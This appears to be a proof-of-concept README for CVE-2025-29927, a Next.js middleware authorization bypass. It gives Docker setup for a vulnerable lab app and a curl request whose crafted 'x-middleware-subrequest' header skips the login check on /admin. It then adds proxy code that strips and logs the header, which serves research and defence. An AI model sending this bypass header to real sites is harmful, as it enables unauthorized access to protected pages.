## https://sploitus.com/exploit?id=F91ED95B-EBC4-55FD-B043-80BCA86603C7
# Next.js Middleware Vulnerability Research (CVE-2025-29927)

This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.

This proof of concept targets the vulnerability as it appears in Next.js **v12** (where the middleware lives at `pages/_middleware`, which is the value the bypass header must carry for that version).

## Usage

### Environment setup

Set up the vulnerable environment with Docker and the files from this repository by running:

```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```

### Exploit 

This repository already contains an `exploit.sh` script that tests the exploitation of the vulnerability. To run it:

```bash
chmod +x exploit.sh
./exploit.sh
```

Alternatively, you can test the exploitation of the vulnerability manually with the following two requests:

1. Request the admin page without authentication. You should get a redirection to the `login` page.

```bash
curl -i http://localhost:3000/admin
```

2. Request the same page without authentication, but this time with the `x-middleware-subrequest` header set. The middleware is skipped, so instead of the redirect to `login` you should receive the admin page itself.

```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```
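The advisory's recommended mitigation when patching is not immediately possible is to stop externally supplied `x-middleware-subrequest` headers from ever reaching the Next.js application. The following is an added example, not code from this repository, of a small Node front/reverse-proxy guard that strips the header (case-insensitively, since clients may vary the casing) and logs every attempt so the bypass attempts shown above become visible in your logs; `forward` and `log` are assumed callbacks supplied by the deployment.

```javascript
// Added example (not part of the original repo): proxy-side hardening and
// detection for CVE-2025-29927. Header names are compared case-insensitively
// because HTTP header names are, and attackers may vary the casing.
const SUBREQUEST_HEADER = 'x-middleware-subrequest';

/**
 * Remove any x-middleware-subrequest header from an incoming header map.
 * Returns the cleaned headers, whether the header was present, and the
 * values seen (kept only for logging / alerting, never forwarded).
 */
function scrubSubrequestHeader(headers) {
  const cleaned = {};
  const seen = [];
  for (const [name, value] of Object.entries(headers || {})) {
    if (name.toLowerCase() === SUBREQUEST_HEADER) {
      seen.push(String(value));
    } else {
      cleaned[name] = value;
    }
  }
  return { headers: cleaned, flagged: seen.length > 0, seen };
}

/**
 * Build a Node `http` request handler that scrubs the header, records the
 * attempt, then hands the sanitised request to `forward` (assumed to be the
 * proxy or app handler). `log` defaults to console.warn.
 */
function makeGuard(forward, log = console.warn) {
  return function guard(req, res) {
    const { headers, flagged, seen } = scrubSubrequestHeader(req.headers);
    if (flagged) {
      const src = (req.socket && req.socket.remoteAddress) || '?';
      log(`[cve-2025-29927] stripped ${SUBREQUEST_HEADER}=${seen.join(',')} ` +
          `from ${src} on ${req.method} ${req.url}`);
    }
    req.headers = headers; // the app now only sees a clean header set
    return forward(req, res);
  };
}

// Stand-alone demo with a constructed request mirroring the curl above.
const demoReq = { headers: { host: 'localhost:3000', 'X-Middleware-Subrequest': 'pages/_middleware' },
                  method: 'GET', url: '/admin', socket: { remoteAddress: '127.0.0.1' } };
makeGuard((req) => console.log('forwarded headers:', req.headers))(demoReq, {});
```

Wire `makeGuard(app)` in front of the Next.js handler (or apply the same strip rule in nginx/your CDN), and alert on the log line: legitimate clients never send this header.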

## Security Advisory

- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)